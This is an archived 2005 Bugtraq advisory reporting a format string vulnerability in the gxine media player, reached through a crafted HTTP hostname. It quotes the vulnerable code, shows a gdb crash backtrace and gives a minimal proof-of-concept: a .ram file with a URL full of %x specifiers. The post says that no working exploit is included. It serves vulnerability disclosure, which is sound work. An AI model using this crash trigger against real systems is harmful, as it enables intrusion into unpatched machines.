[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050521222956.11055.qmail@www.securityfocus.com>
Date: 21 May 2005 22:29:56 -0000
From: yan feng <jsk@...nt0m.net>
To: bugtraq@...urityfocus.com
Subject: pst.advisory 2005-21: gxine remote exploitable . opensource is
god .lol windows
gxine remote exploitable . opensource is god .lol windows
www.ph4nt0m.org
Systems affected:
gxine 0.44 0.43 0.42 0.41
no affected
no all exploitable
1:why: it is a http hostname format string vulnerability.. new firefox can run gxine in many linux DS...
so very dangerous!!!!!!!!!!!!!!!!!!
2:tips:
void v_display_message (const gchar *title, GtkMessageType type,
const gchar *fmt, va_list ap)
{
GtkWidget *dialog;
gchar *msg;
gboolean modal = (fmt == NULL);
if (modal)
fmt = va_arg (ap, const gchar *);
msg = g_strdup_vprintf (fmt, ap);
va_end (ap);
dialog = gtk_message_dialog_new (NULL, GTK_DIALOG_DESTROY_WITH_PARENT, type,
GTK_BUTTONS_CLOSE, msg); boom ...GTK_BUTTONS_CLOSE,(((((%s))))) msg
gtk_window_set_title (GTK_WINDOW (dialog), title);
gtk_window_set_position (GTK_WINDOW (dialog), GTK_WIN_POS_CENTER);
if (modal)
gtk_window_set_modal (GTK_WINDOW(dialog), TRUE);
g_signal_connect (G_OBJECT (dialog), "response",
G_CALLBACK (response_cb), NULL);
g_object_set_data (G_OBJECT (dialog), "msg", msg);
gtk_widget_show (dialog);
}
v_display_message ()--- display_error" many other func" ()----display_error" many other func" ()
---report_error ()---http_open ()
3:more show
Program received signal SIGSEGV, Segmentation fault.
0x405cdc43 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0x405cdc43 in vfprintf () from /lib/libc.so.6
#1 0x405ec976 in vasprintf () from /lib/libc.so.6
#2 0x405493d7 in g_vasprintf () from /usr/lib/libglib-2.0.so.0
#3 0x40539674 in g_strdup_vprintf () from /usr/lib/libglib-2.0.so.0
#4 0x40217391 in gtk_message_dialog_new () from /usr/lib/libgtk-x11-2.0.so.0
#5 0x0806dc83 in v_display_message ()
#6 0x0806dda2 in display_error ()
#7 0x0806cf45 in report_error ()
#8 0x0806d278 in http_open ()
Previous frame inner to this frame (corrupt stack?)
(gdb) x/i $eip
0x405cdc43 <vfprintf+10195>: mov %ecx,(%eax)
4: A LAME proof-of-concept
cat fmtexp.ram
http://AAAAA%x%x%x%x%x%x%x%x%x%x%x%...paihb/42tj02.rm
no working exploit will be here
CREDIT:
jsk:exworm (www.0xbadexworm.org) discovery this vulnerability
ths: all members from PST and doris
Powered by blists - more mailing lists